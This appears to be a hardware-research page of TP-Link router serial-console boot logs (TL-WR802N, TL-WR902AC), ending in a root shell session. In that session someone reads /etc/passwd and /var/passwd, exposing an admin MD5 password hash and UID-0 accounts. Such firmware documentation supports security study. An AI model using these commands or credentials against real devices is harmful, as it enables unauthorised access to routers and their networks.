Will output 1024 bit dss secret key to '/var/tmp/dropbear/dropbear_dss_host_key'
Generating key, this may take a while...
[ util_execSystem ] 139: prepareDropbear cmd is "dropbear -p 22 -r /var/tmp/dropbear/dropbear_rsa_host_key -d /var/tmp/dropbear/dropbear_dss_host_key -A /var/tmp/dropbear/dropbearpwd"
~ #
ⓘ TL-WR802N: Wireless N - Nano Router
115200 (8N1)
Linux version 2.6.36 (jenkins@mobile-System) (gcc version 4.6.3 (Buildroot 2012.11.1) ) #1 Sun Apr 28 17:33:31 CST 2019
The CPU feqenuce set to 575 MHz
MIPS CPU sleep mode enabled.
CPU revision is: 00019655 (MIPS 24Kc)
Software DMA cache coherency
Determined physical RAM map:
memory: 04000000 @ 00000000 (usable)
Initrd not found or empty - disabling initrd
Zone PFN ranges:
Normal 0x00000000 -> 0x00004000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
0: 0x00000000 -> 0x00004000
Built 1 zonelists in Zone order, mobility grouping on. Total pages: 16256
Kernel command line: console=ttyS1,115200 root=/dev/mtdblock2 rootfstype=squashfs init=/sbin/init
PID hash table entries: 256 (order: -2, 1024 bytes)
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Primary instruction cache 64kB, VIPT, , 4-waylinesize 32 bytes.
Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
Writing ErrCtl register=0005e136
Readback ErrCtl register=0005e136
Memory: 61424k/65536k available (2414k kernel code, 4112k reserved, 636k data, 160k init, 0k highmem)
NR_IRQS:128
console [ttyS1] enabled
Calibrating delay loop... 386.04 BogoMIPS (lpj=772096)
pid_max: default: 4096 minimum: 301
Mount-cache hash table entries: 512
NET: Registered protocol family 16
bio: create slab <bio-0> at 0
Switching to clocksource Ralink Systick timer
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
NET: Registered protocol family 1
squashfs: version 4.0 (2009/01/31) Phillip Lougher
fuse init (API version 7.15)
msgmni has been set to 119
io scheduler noop registered
io scheduler deadline registered (default)
Ralink gpio driver initialized
i2cdrv_major = 218
Serial: 8250/16550 driver, 2 ports, IRQ sharing enabled
serial8250: ttyS0 at MMIO 0x10000d00 (irq = 21) is a 16550A
serial8250: ttyS1 at MMIO 0x10000c00 (irq = 20) is a 16550A
brd: module loaded
flash manufacture id: ef, device id 40 17
W25Q64BV(ef 40170000) (8192 Kbytes)
mtd .name = raspi, .size = 0x00800000 (8M) .erasesize = 0x00010000 (64K) .numeraseregions = 0
Creating 7 MTD partitions on "raspi":
0x000000000000-0x000000020000 : "boot"
0x000000020000-0x000000160000 : "kernel"
0x000000160000-0x0000007c0000 : "rootfs"
mtd: partition "rootfs" set to be root filesystem
0x0000007c0000-0x0000007d0000 : "config"
0x0000007d0000-0x0000007e0000 : "romfile"
0x0000007e0000-0x0000007f0000 : "rom"
0x0000007f0000-0x000000800000 : "radio"
Register flash device:flash0
PPP generic driver version 2.4.2
PPP MPPE Compression module registered
NET: Registered protocol family 24
Mirror/redirect action on
u32 classifier
Actions configured
Netfilter messages via NETLINK v0.30.
nf_conntrack version 0.5.0 (959 buckets, 3836 max)
ip_tables: (C) 2000-2006 Netfilter Core Team, Type=Linux
TCP cubic registered
NET: Registered protocol family 10
ip6_tables: (C) 2000-2006 Netfilter Core Team
IPv6 over IPv4 tunneling driver
NET: Registered protocol family 17
Ebtables v2.0 registered
802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
All bugs added by David S. Miller <davem@redhat.com>
VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
Freeing unused kernel memory: 160k freed
starting pid 34, tty '': '/etc/init.d/rcS'
cp: can't stat '/etc/SingleSKU_FCC.dat': No such file or directory
rdm_major = 253
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash( 7df100) 74-ffffffda-ffffff88-fffffffc-ffffffc3-ffffffae
GMAC1_MAC_ADRH -- : 0x000074da
GMAC1_MAC_ADRL -- : 0x88fcc3ae
Ralink APSoC Ethernet Driver Initilization. v3.1 256 rx/tx descriptors allocated, mtu = 1500!
NAPI enable, Tx Ring = 256, Rx Ring = 256
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash( 7df100) 74-ffffffda-ffffff88-fffffffc-ffffffc3-ffffffae
GMAC1_MAC_ADRH -- : 0x000074da
GMAC1_MAC_ADRL -- : 0x88fcc3ae
PROC INIT OK!
add domain:tplinkwifi.net
add domain:tplinkap.net
add domain:tplinkrepeater.net
add domain:tplinklogin.net
tp_domain init ok
L2TP core driver, V2.0
PPPoL2TP kernel driver, V2.0
Set: phy[0].reg[0] = 3900
Set: phy[1].reg[0] = 3900
Set: phy[2].reg[0] = 3900
Set: phy[3].reg[0] = 3900
Set: phy[4].reg[0] = 3900
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[0] = 3300
resetMiiPortV over.
Set: phy[0].reg[4] = 01e1
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[4] = 01e1
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[4] = 01e1
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[4] = 01e1
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[4] = 01e1
Set: phy[4].reg[0] = 3300
turn off flow control over.
starting pid 82, tty '/dev/ttyS1': '/bin/sh'
~ # [ util_execSystem ] 141: ipt_init cmd is "/var/tmp/dconf/rc.router"
[ dm_readFile ] 2061: can not open xml file /var/tmp/pc/reduced_data_model.xml!, about to open file /etc/reduced_data_model.xml
spiflash_ioctl_read, Read from 0x007c0000 length 0x10000, ret 0, retlen 0x10000
spiflash_ioctl_read, Read from 0x007c0000 length 0xa1b0, ret 0, retlen 0xa1b0
===>Enter Routerspiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
mode
[ oal_sys_readMaspiflash_ioctl_read, Read from 0x007df200 length 0x4, ret 0, retlen 0x4
cFlash ] 1174: spiflash_ioctl_read, Read from 0x007df300 length 0x4, ret 0, retlen 0x4
set flash mac : spiflash_ioctl_read, Read from 0x007df400 length 0x10, ret 0, retlen 0x10
74:DA:88:FC:C3:Aspiflash_ioctl_read, Read from 0x007df500 length 0x29, ret 0, retlen 0x29
E.
spiflash_ioctl_read, Read from 0x007df600 length 0x21, ret 0, retlen 0x21
spiflash_ioctl_read, Read from 0x007df700 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x007df700 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x00020000 length 0x1d0, ret 0, retlen 0x1d0
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
[ oal_sys_readMacFlash ] 1174: set flash mac : 74:DA:88:FC:C3:AE.
sendto: No such file or directory
pid 81 send 2001 error
Get SNTP new config
[ util_execSystem ] 141: oal_startDynDns cmd is "dyndns /var/tmp/dconf/dyndns.conf"
[ util_execSystem ] 141: oal_startNoipDns cmd is "noipdns /var/tmp/dconf/noipdns.conf"
[ util_execSystem ] 141: oal_startCmxDns cmd is "cmxdns /var/tmp/dconf/cmxdns.conf"
ioctl: No such device
[ util_execSystem ] 141: oal_br_addBridge cmd is "brctl addbr br0;brctl setfd br0 0;brctl stp br0 off"
[ util_execSystem ] 141: oal_ipt_addLanRules cmd is "iptables -t filter -A INPUT -i br+ -j ACCEPT
[ util_execSystem ] 141: oal_intf_setIntf cmd is "ifconfig br0 192.168.1.1 netmask 255.255.255.0 up"
[ util_execSystem ] 141: oal_util_setProcLanAddr cmd is "echo "br0 16885952,"Raeth v3.1 ( > /proc/net/conNAPI
ntract_LocalAddr,SkbRecycle"
[ util_exec)
System ] 141: o
phy_tx_ring = 0x030cf000, tx_ring = 0xa30cf000
al_intf_enableIn
phy_rx_ring0 = 0x030d0000, rx_ring0 = 0xa30d0000
tf cmd is "ifcon[fe_sw_init:5350]rt305x_esw_init.
fig eth0 up"
disable switch phyport...
GMAC1_MAC_ADRH -- : 0x000074da
GMAC1_MAC_ADRL -- : 0x88fcc3ae
RT305x_ESW: Link Status Changed
[ rsl_getUnusedVlan ] 1079: GET UNUSED VLAN TAG 1 : [3]
[ rsl_getUnusedVlan ] 1079: GET UNUSED VLAN TAG 2 : [4]
[ rsl_getUnusedVlan ] 1079: GET UNUSED VLAN TAG 3 : [5]
[ rsl_getUnusedVlan ] 1079: GET UNUSED VLAN TAG 4 : [6]
[ util_execSystem ] 141: oal_addVlanTagIntf cmd is "vconfig add eth0 3"
[ util_execSystem ] 141: oal_intf_enableIntf cmd is "ifconfig eth0.3 up"
set if eth0.3 to *not wan dev
[ util_execSystem ] 141: oal_addVlanTagIntf cmd is "vconfig add eth0 4"
[ util_execSystem ] 141: oal_intf_enableIntf cmd is "ifconfig eth0.4 up"
set if eth0.4 to *not wan dev
[ util_execSystem ] 141: oal_addVlanTagIntf cmd is "vconfig add eth0 5"
[ util_execSystem ] 141: oal_intf_enableIntf cmd is "ifconfig eth0.5 up"
set if eth0.5 to *not wan dev
[ util_execSystem ] 141: oal_addVlanTagIntf cmd is "vconfig add eth0 6"
[ util_execSystem ] device eth0.3 entered promiscuous mode
141: oal_intf_edevice eth0 entered promiscuous mode
nableIntf cmd isbr0: port 1(eth0.3) entering forwarding state
"ifconfig eth0.br0: port 1(eth0.3) entering forwarding state
6 up"
set if eth0.6 to *not wan dev
[ util_execSystem ] 141: oal_addVlanTagdevice eth0.4 entered promiscuous mode
Intf cmd is "vcobr0: port 2(eth0.4) entering forwarding state
nfig add eth0 2"br0: port 2(eth0.4) entering forwarding state
[ util_execSystem ] 141: oal_intf_enableIntf cmd is "ifconfig eth0.2 up"
device eth0.5 entered promiscuous mode
set if eth0.2 tbr0: port 3(eth0.5) entering forwarding state
o wan dev
[ vlabr0: port 3(eth0.5) entering forwarding state
n_addLanPortsIntoBridge ] 606: add lan Port 255 from br0
[ util_execSystem ] 1device eth0.6 entered promiscuous mode
41: oal_br_addIbr0: port 4(eth0.6) entering forwarding state
ntfIntoBridge cmbr0: port 4(eth0.6) entering forwarding state
d is "brctl addif br0 eth0.3"
[ util_execSystem ] 141: oal_br_addIntfIntoBridge cmd is "brctl addif br0 eth0.4"
[ util_execSystem ] 141: oal_br_addIntfIntoBridge cmd is "brctl addif br0 eth0.5"
[ util_execSystem ] 141: oal_br_addIntfIntoBridge cmd is "brctl addif br0 eth0.6"
[ util_execSystem ] 141: rsl_initIPv6CfgObj cmd is "echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6"
[ util_execSystem ] 141: oal_eth_setIGMPSnoopParam cmd is "for i in /sys/devices/virtual/net/*/bridge/multicast_snooping;do echo 1 > $i ; done"
[ util_execSystem ] 141: oal_wlan_ra_setCountryRegion cmd is "cp /etc/SingleSKU_CE.dat /var/Wireless/RT2860AP/SingleSKU.dat"
[ util_execSystem ] 141: oal_wlan_ra_setCountryRegion cmd is "iwpriv ra0 set CountryRegion=1"
ra0 no private ioctls.
[ util_execSystem ] 141: oal_wlan_ra_loadDriver cmd is "insmod /lib/modules/kmdir/kernel/drivers/net/wireless/mt_wifi_ap/mt_wifi.ko"
ADDRCONF(NETDEV_CHANGE): eth0.4: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.5: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.6: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.2: link becomes ready
=== pAd = c085d000, size = 1509896 ===
<-- RTMPAllocTxRxRingMemory, Status=0, ErrorValue=0x
<-- RTMPAllocAdapterBlock, Status=0
RtmpChipOpsHook(492): Not support for HIF_MT yet!
mt7628_init()-->
mt7628_init(FW(8a00), HW(8a01), CHIPID(7628))
e2.bin mt7628_init(1156)::(2), pChipCap->fw_len(64560)
mt_bcn_buf_init(218): Not support for HIF_MT yet!
<--mt7628_init()
[ util_execSystem ] 141: oal_wlan_ra_initWlan cmd is "ifconfig ra0 up"
TX_BCN DESC a32b6000 size = 320
RX[0] DESC a32b8000 size = 2048
RX[1] DESC a32b9000 size = 2048
RT_CfgSetApcliMacAddress : invalid mac setting
cfg_mode=9
cfg_mode=9
wmode_band_equal(): Band Equal!
AndesSendCmdMsg: Could not send in band command due to diable fRTMP_ADAPTER_MCU_SEND_IN_BAND_CMD
APSDCapable[0]=0
APSDCapable[1]=0
APSDCapable[2]=0
APSDCapable[3]=0
APSDCapable[4]=0
APSDCapable[5]=0
APSDCapable[6]=0
APSDCapable[7]=0
APSDCapable[8]=0
APSDCapable[9]=0
APSDCapable[10]=0
APSDCapable[11]=0
APSDCapable[12]=0
APSDCapable[13]=0
APSDCapable[14]=0
APSDCapable[15]=0
default ApCliAPSDCapable[0]=0
Key1Str is Invalid key length(0) or Type(0)
Key1Str is Invalid key length(0) or Type(0)
Key2Str is Invalid key length(0) or Type(0)
Key2Str is Invalid key length(0) or Type(0)
Key3Str is Invalid key length(0) or Type(0)
Key3Str is Invalid key length(0) or Type(0)
Key4Str is Invalid key length(0) or Type(0)
Key4Str is Invalid key length(0) or Type(0)
WscKeyASCII=8
WscKeyASCII=8
[RTMPReadParametersHook:297]wifi read profile faild.
load fw image from fw_header_image
AndesMTLoadFwMethod1(2263)::pChipCap->fw_len(64560)
FW Version:1
FW Build Date:20161213152835
CmdAddressLenReq:(ret = 0)
CmdFwStartReq: override = 1, address = 1048576
CmdStartDLRsp: WiFI FW Download Success
MtAsicDMASchedulerInit(): DMA Scheduler Mode=0(LMAC)
efuse_probe: efuse = 10000012
RtmpChipOpsEepromHook::e2p_type=0, inf_Type=4
RtmpEepromGetDefault::e2p_dafault=2
RtmpChipOpsEepromHook: E2P type(2), E2pAccessMode = 2, E2P default = 2
NVM is FLASH mode
1. Phy Mode = 14
exec!
spiflash_ioctl_read, Read from 0x007f0000 length 0x400, ret 0, retlen 0x400
tx or rx disable[f0000300][count=0]!!!
eeFlashId = 0x7628!
tx or rx disable[f0000300][count=1]!!!
Country Region from e2p = ffff
tssi_1_target_pwr_g_band = 34
2. Phy Mode = 14
3. Phy Mode = 14
NICInitPwrPinCfg(11): Not support for HIF_MT yet!
NICInitializeAsic(651): Not support rtmp_mac_sys_reset () for HIF_MT yet!
mt_mac_init()-->
MtAsicInitMac()-->
mt7628_init_mac_cr()-->
MtAsicSetMacMaxLen(1277): Set the Max RxPktLen=450!
<--mt_mac_init()
WTBL Segment 1 info:
tx or rx disable[f0000300][count=2]!!!
Reset tx rx bit!!!
MemBaseAddr/FID:0x28000/0
EntrySize/Cnt:32/128
WTBL Segment 2 info:
MemBaseAddr/FID:0x40000/0
EntrySize/Cnt:64/128
WTBL Segment 3 info:
MemBaseAddr/FID:0x42000/64
EntrySize/Cnt:64/128
WTBL Segment 4 info:
MemBaseAddr/FID:0x44000/128
EntrySize/Cnt:32/128
AntCfgInit(2940): Not support for HIF_MT yet!
MCS Set = ff ff 00 00 01
MtAsicSetChBusyStat(861): Not support for HIF_MT yet!
FW LOG: !!!! Pass, dont need recal (total fail[0])
FW LOG: !!!! Pass, dont need recal (total fail[0])
FW LOG: !!!! Pass, dont need recal (total fail[0])
FW LOG: RxDCOC Set DC Valid(8)(2)
tx or rx disable[f0000300][count=0]!!!
CmdSlotTimeSet:(ret = 0)
[PMF]ap_pmf_init:: apidx=0, MFPC=0, MFPR=0, SHA256=0
[PMF]RTMPMakeRsnIeCap: RSNIE Capability MFPC=0, MFPR=0
[PMF]ap_pmf_init:: apidx=1, MFPC=0, MFPR=0, SHA256=0
MtAsicSetRalinkBurstMode(3156): Not support for HIF_MT yet!
MtAsicSetPiggyBack(796): Not support for HIF_MT yet!
reload DPD from flash , 0x9F = [ca00] doReload bit7[0]
CmdLoadDPDDataFromFlash: Channel = 3, DoReload = 0
MtAsicSetTxPreamble(3135): Not support for HIF_MT yet!
MtAsicAddSharedKeyEntry(1344): Not support for HIF_MT yet!
The 4-BSSID mode is enabled, the BSSID byte5 MUST be the multiple of 4
MtAsicSetPreTbtt(): bss_idx=0, PreTBTT timeout = 0xf0
ap_ftkd> Initialize FT KDP Module...
Main bssid = 74:da:88:fc:c3:ae
<==== rt28xx_init, Status=0
@@@ ed_monitor_init : ===>
@@@ ed_monitor_init : <===
mt7628_set_ed_cca: TURN ON EDCCA mac 0x10618 = 0xd7c87d0f, EDCCA_Status=1
WiFi Startup Cost (ra0): 3.464s
[ util_execSystem ] 141: oal_wlan_ra_initWlan cmd is "echo 1 > /proc/tplink/led_wlan_24G"
[ util_execSystem ] 141: oal_wlanSet_ed_chk_proc()::ed_chk=0
_ra_initWlan cmdmt7628_set_ed_cca: TURN OFF EDCCA mac 0x10618 = 0xd7083f0f, EDCCA_Status=0
is "iwpriv ra0 set ed_chk=0"
[ util_execSystem ] 141: oal_wlan_ra_setStaNum cmd is "iwpriv ra0 set MaxStaNum=32"
[ util_execSystem ] 141: oal_br_addIntfIntoBridge cmd device ra0 entered promiscuous mode
is "brctl addif br0: port 5(ra0) entering forwarding state
br0 ra0"
br0: port 5(ra0) entering forwarding state
[ util_execSystem ] 141: oal_br_addIntfIntoBridge cmd is "brctldevice apcli0 entered promiscuous mode
addif br0 apcli0"
[ util_execSystem ] 141: oal_br_addIntfIntoBridge cmd is device ra1 entered promiscuous mode
"brctl addif br0 ra1"
[ util_execSystem ] 141: oal_wlan_ra_initEnd cmspiflash_ioctl_read, Read from 0x007f0000 length 0x2, ret 0, retlen 0x2
d is "wlNetlinkTool &"
[ util_execSystem ] 141: oal_wlan_ra_initEnd cmd is "killall -q wscd"
WLAN-Start wlNetlinkTool
Waiting for Wireless Events from interfaces...
swWlanChkAhbErr: netlink to do
[ util_execSystem ] 141: oal_wlan_ra_initEnd cmd is "wscd -i ra0 -m 1 -w /var/tmp/wsc_upnp/ &"
[ util_execSystem ] 141: rsl_initLanWlanObj cmd is "echo 0 > /proc/tplink/wl_mode"
[ oal_wlan_ra_loadDriver ] 2040: no 5G chip.
[ rsl_initLanWlanObj ] 9419: perror:1
wscd: SSDP UDP PORT = 1900
sendto: No such file or directory
pid 81 send 2030 error
sendto: No such file or directory
pid 81 send 2004 error
[ util_execSystem ] 141: oal_startDhcps cmd is "dhcpd /var/tmp/dconf/udhcpd.conf"
[ util_execSystem ] 141: oal_lan6_startDhcp6s cmd is "dhcp6s -c /var/tmp/dconf/dhcp6s_br0.conf -P /var/run/dhcp6s_br0.pid br0 &"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141: oal_lan6_startRadvd cmd is "radvd -C /var/tmp/dconf/radvd_br0.conf -p /var/run/radvd_br0.pid &"
[ util_execSystem ] 141: oal_startSnmp cmd is "snmpd -f /var/tmp/dconf/snmpd.conf"
mldProxy# file: src/mld_ifinfo.c;line: 102; error = No such file or directory
mldProxy# Err: get LLA failed
[ rsl_initEwanObj ] 298: Initialize EWAN, enable(1)!
[ rsl_setEwanObj ] 208: Get Ethernet's stack!
[ rsl_setEwanObj ] 262: enable ethernet interface now!
[ oal_ewan_enable ] 458: pEwan->ifName(eth0.2)
[ util_execSystem ] 141: oal_br_delIntfFromBridge cmd is "brctl delif br0 eth0.2"
brctl: bridge br0: Invalid argument
[ rsl_setEwanObj ] 268: EWAN.ifname(eth0.2)!
[ wan_conn_wanIpConn_getConnectionInfo ] 906: GET MAC(74:DA:88:FC:C3:AF) successfully!
[ util_execSystem ] 141: oal_intf_setIfMac cmd is "ifconfig eth0.2 down"
[ util_execSystem ] 141: oal_intf_setIfMac cmd is "ifconfig eth0.2 hw ether 74:DA:88:FC:C3:AF up"
[ util_execSystem ] 141: oal_intf_enableIntf cmd is "ifconfig eth0.2 up"
[ rsl_initWanPppConnObj ] 398: into rsl_initWanPppConnObj!
[ rsl_initWanPppConnObj ] 515: rsl_initWanPppConnObj successed!
[ rsl_initWanPppConnObj ] 398: into rsl_initWanPppConnObj!
[ rsl_initWanPppConnObj ] 515: rsl_initWanPppConnObj successed!
radvd starting
[Jan 01 00:00:08] radvd: no linklocal address configured for br0
[Jan 01 00:00:08] radvd: error parsing or activating the config file: /var/tmp/dconf/radvd_br0.conf
[ rsl_initAppObj ] 1020: ==> start dhcp client
[ util_execSystem ] 141: oal_ipt_fwDdos cmd is "iptables -D FORWARD -j FIREWALL_DDOS
"
iptables: No chain/target/match by that name.
[ util_execSystem ] 141: oal_ipt_forbidLanPing cmd is "iptables -t filter -D INPUT -i br+ -p icmp --icmp-type echo-request -j DROP
iptables -t filter -D FORWARD -i br+ -p icmp --icmp-type echo-request -j DROP
"
iptables: Bad rule (does a matching rule exist in that chain?).
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141: oal_ddos_delPingRule cmd is "iptables -t filter -D INPUT ! -i br+ -p icmp --icmp-type echo-request -j ACCEPT
"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141: oal_ipt_setDDoSRules cmd is "iptables -F FIREWALL_DDOS"
[ util_execSystem ] 141: ddos_clearAll cmd is "rm -f /var/tmp/dosHost"
[ util_execSystem ] 141: oal_initFirewallObj cmd is "ebtables -N FIREWALL"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -F"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -X"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -P INPUT ACCEPT"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -P FORWARD DROP"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -P OUTPUT ACCEPT"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -N FIREWALL"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -N FWRULE"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -N SETMSS"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i lo -p ALL -j ACCEPT -m comment --comment "loop back""
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p tcp --dport 23 -j ACCEPT"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p tcp --dport 23 -j DROP"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p tcp --dport 22 -j ACCEPT"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p tcp --dport 22 -j DROP"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -i br+ -p icmpv6 --icmpv6-type echo-request -j ACCEPT"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A INPUT -p icmpv6 --icmpv6-type echo-request -j DROP"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -i br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -o br+ -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -A FORWARD -j FIREWALL"
[ util_execSystem ] 141: oal_initIp6FirewallObj cmd is "ip6tables -I FORWARD 1 -j SETMSS"
[ util_execSystem ] 141: oal_fw6_setFwEnabeld cmd is "ip6tables -D FIREWALL -j ACCEPT"
ip6tables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141: oal_fw6_setFwEnabeld cmd is "ip6tables -F FIREWALL"
[ util_execSystem ] 141: oal_fw6_setFwEnabeld cmd is "ip6tables -A FIREWALL -j ACCEPT"
[ rsl_initWanL2tpConnObj ] 245: L2TP Connection(ewan_l2tp) is not enable.
[ rsl_initWanL2tpConnObj ] 245: L2TP Connection() is not enable.
[ rsl_initWanPptpConnObj ] 239: PPTP Connection(ewan_pptp) is not enable.
[ rsl_initWanPptpConnObj ] 239: PPTP Connection() is not enable.
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_ftp.ko"
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_ftp.ko"
[ util_execSystem ] 141: oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH -p udp --dport 500 -j DROP"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_proto_gre.ko"
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_pptp.ko"
[ util_execSystem ] 141: oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH -p tcp --dport 1723 -j DROP"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141: oal_openAlg cmd is "iptables -D FORWARD_VPN_PASSTHROUGH -p udp --dport 1701 -j DROP"
iptables: Bad rule (does a matching rule exist in that chain?).
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_tftp.ko"
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_tftp.ko"
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_h323.ko"
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_h323.ko"
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_sip.ko"
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_sip.ko"
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/netfilter/nf_conntrack_rtsp.ko"
[ util_execSystem ] 141: setupModules cmd is "insmod /lib/modules/kmdir/kernel/net/ipv4/netfilter/nf_nat_rtsp.ko"
nf_nat_rtsp v0.6.21 loading
enable switch phyport...
Set: phy[0].reg[0] = 3900
Set: phy[1].reg[0] = 3900
Set: phy[2].reg[0] = 3900
Set: phy[3].reg[0] = 3900
Set: phy[4].reg[0] = 3900
[cmd_dutInit():1081] init shm
[tddp_taskEntry():151] tddp task start
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[0] = 3300
resetMiiPortV over.
Set: phy[0].reg[4] = 01e1
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[4] = 01e1
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[4] = 01e1
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[4] = 01e1
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[4] = 01e1
Set: phy[4].reg[0] = 3300
turn off flow control over.
[ util_execSystem ] 141: prepareDropbear cmd is "dropbearkey -t rsa -f /var/tmp/dropbear/dropbear_rsa_host_key"
Will output 1024 bit rsa secret key to '/var/tmp/dropbear/dropbear_rsa_host_key'
Generating key, this may take a while...
[ util_execSystem ] 141: prepareDropbear cmd is "dropbearkey -t dss -f /var/tmp/dropbear/dropbear_dss_host_key"
Will output 1024 bit dss secret key to '/var/tmp/dropbear/dropbear_dss_host_key'
Generating key, this may take a while...
Live Analysis
TL-WR902AC: Firmware 170828
ⓘ Available tools
arping dropbear iwconfig pppd tdpd ash dropbearkey iwlist ps tftp ated_tp dropbearmulti iwpriv pwdog tmpd bpalogin dyndns kill radvd top brctl ebtables killall reboot traceroute busybox echo login reg umount cat free ls ripd upnpd chat getty lsmod rm usb_modeswitch chmod halt mii_mgr rmmod usbp cli handle_card mii_mgr_cl45 route ushare cmxdns hotplug mkdir rt2860apd vconfig config-mii.sh httpd mldProxy rtinicapd vsftpd cos ifconfig modem_scan scp wanType cp igmpd mount sh wlNetlinkTool date init netstat sleep wscd df insmod noipdns smbcontrol wscd_5G dhcp6c ip ntfs-3g smbd xl2tpd dhcp6s ip6tables ntpc smbpasswd xtables-multi dhcpc ipcrm pidof switch zebra dhcpd ipcs ping taskset diagTool ipping ping6 tc dnsProxy iptables poweroff tddp
ⓘ Mounted filesystems
rootfs on / type rootfs (rw) /dev/root on / type squashfs (ro,relatime) proc on /proc type proc (rw,relatime) ramfs on /var type ramfs (rw,relatime) devpts on /dev/pts type devpts (rw,relatime,mode=600) /sys on /sys type sysfs (rw,relatime) usbfs on /proc/bus/usb type usbfs (rw,relatime)
ⓘ Service configuration
# echo $USER
root
# cat /etc/passwd
admin:$1$$iC.dUsGpxNNJGeOm1dFio/:0:0:root:/:/bin/sh
dropbear:x:500:500:dropbear:/var/tmp/dropbear:/bin/sh
nobody:*:99:99:nobody:/:/bin/sh
guest:*:0:0:guest:/var/usbdisk/:/bin/sh
# cat /var/passwd
admin:$1$$iC.dUsGpxNNJGeOm1dFio/:0:0:root:/:/bin/sh
dropbear:x:500:500:dropbear:/var/tmp/dropbear:/bin/sh
nobody:*:99:99:nobody:/:/bin/sh
guest:*:0:0:guest:/var/usbdisk/:/bin/sh
# cat /etc/vsftpd_passwd
